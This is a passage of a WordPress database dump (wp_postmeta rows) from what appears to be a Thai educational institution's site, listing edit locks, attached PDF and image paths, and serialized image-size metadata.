{}}}'),
(28707, 11737, '_edit_lock', '1622793424:14'),
(28708, 11737, '_edit_last', '14'),
(28709, 11738, '_wp_attached_file', '2021/06/ประกาศรายชื่อครูพิเศษสอน.pdf'),
(28712, 11737, '_hide_featured', NULL),
(28715, 11740, '_wp_attached_file', '2019/12/070664.jpg'),
(28716, 11740, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:18:\"2019/12/070664.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"070664-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"070664-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"070664-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"070664-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"070664-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28717, 11742, '_edit_lock', '1623034074:14'),
(28718, 11742, '_edit_last', '14'),
(28719, 11743, '_wp_attached_file', '2021/06/ประกาศรับ-ชย.-โลจิสติกส์.pdf'),
(28722, 11742, '_hide_featured', NULL),
(28729, 11745, '_wp_attached_file', '2019/12/7มิย64.png'),
(28730, 11745, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2019/12/7มิย64.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"7มิย64-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"7มิย64-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"7มิย64-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"7มิย64-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28731, 11747, '_wp_attached_file', '2019/12/26057.jpg'),
(28732, 11747, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:17:\"2019/12/26057.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"26057-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"26057-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"26057-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"26057-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"26057-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28733, 11749, '_wp_attached_file', '2019/12/27018.jpg'),
(28734, 11749, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:17:\"2019/12/27018.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"27018-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"27018-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"27018-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"27018-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"27018-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28735, 11752, '_wp_attached_file', '2019/12/27543.jpg'),
(28736, 11752, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:650;s:4:\"file\";s:17:\"2019/12/27543.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"27543-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"27543-300x181.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"27543-768x462.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"27543-1024x616.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:616;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"27543-400x241.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28737, 11754, '_wp_attached_file', '2019/12/27543-1.jpg'),
(28738, 11754, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:650;s:4:\"file\";s:19:\"2019/12/27543-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"27543-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"27543-1-300x181.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"27543-1-768x462.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"27543-1-1024x616.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:616;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"27543-1-400x241.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28739, 11755, '_wp_attached_file', '2019/12/28547.jpg'),
(28740, 11755, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:657;s:4:\"file\";s:17:\"2019/12/28547.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"28547-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"28547-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"28547-768x467.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:467;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"28547-1024x623.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:623;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"28547-400x243.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:243;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28741, 11757, '_edit_lock', '1623731288:14'),
(28742, 11757, '_edit_last', '14'),
(28743, 11758, '_wp_attached_file', '2021/06/ดาวน์โหลด.png'),
(28744, 11758, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:39:\"2021/06/ดาวน์โหลด.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ดาวน์โหลด-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28745, 11757, '_oembed_9b3773dd93ccc835a02c0e93ff7f0fa2', '{{unknown}}'),
(28746, 11757, '_oembed_3ebbebdcf5fd6eca8e12836e896c833f', '{{unknown}}'),
(28749, 11757, '_hide_featured', NULL),
(28756, 11760, '_wp_attached_file', '2019/12/29523.jpg'),
(28757, 11760, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:17:\"2019/12/29523.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"29523-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"29523-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"29523-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"29523-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"29523-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28758, 11762, '_edit_lock', '1623813927:14'),
(28759, 11762, '_edit_last', '14'),
(28760, 11763, '_wp_attached_file', '2021/06/ประกาศรายชื่อสอบครูพิเศษสอน-ชย.ลจ.pdf'),
(28763, 11762, '_hide_featured', NULL),
(28766, 11765, '_edit_lock', '1623815153:14'),
(28767, 11765, '_edit_last', '14'),
(28768, 11766, '_wp_attached_file', '2021/06/160664-01.jpg'),
(28769, 11766, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-01-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-01-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-01-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-01-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28770, 11767, '_wp_attached_file', '2021/06/160664-02.jpg'),
(28771, 11767, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-02-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-02-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-02-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-02-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28772, 11768, '_wp_attached_file', '2021/06/160664-03.jpg'),
(28773, 11768, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:764;s:4:\"file\";s:21:\"2021/06/160664-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-03-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-03-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-03-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-03-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28774, 11769, '_wp_attached_file', '2021/06/160664-04.jpg'),
(28775, 11769, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:21:\"2021/06/160664-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"160664-04-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-04-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28776, 11770, '_wp_attached_file', '2021/06/160664-05.jpg'),
(28777, 11770, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:21:\"2021/06/160664-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-05-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"160664-05-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-05-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-05-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28778, 11771, '_wp_attached_file', '2021/06/160664-06.1.jpg'),
(28779, 11771, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.1-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28780, 11772, '_wp_attached_file', '2021/06/160664-06.2.jpg'),
(28781, 11772, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.2-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28782, 11773, '_wp_attached_file', '2021/06/160664-06.3.jpg'),
(28783, 11773, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.3-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.3-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s: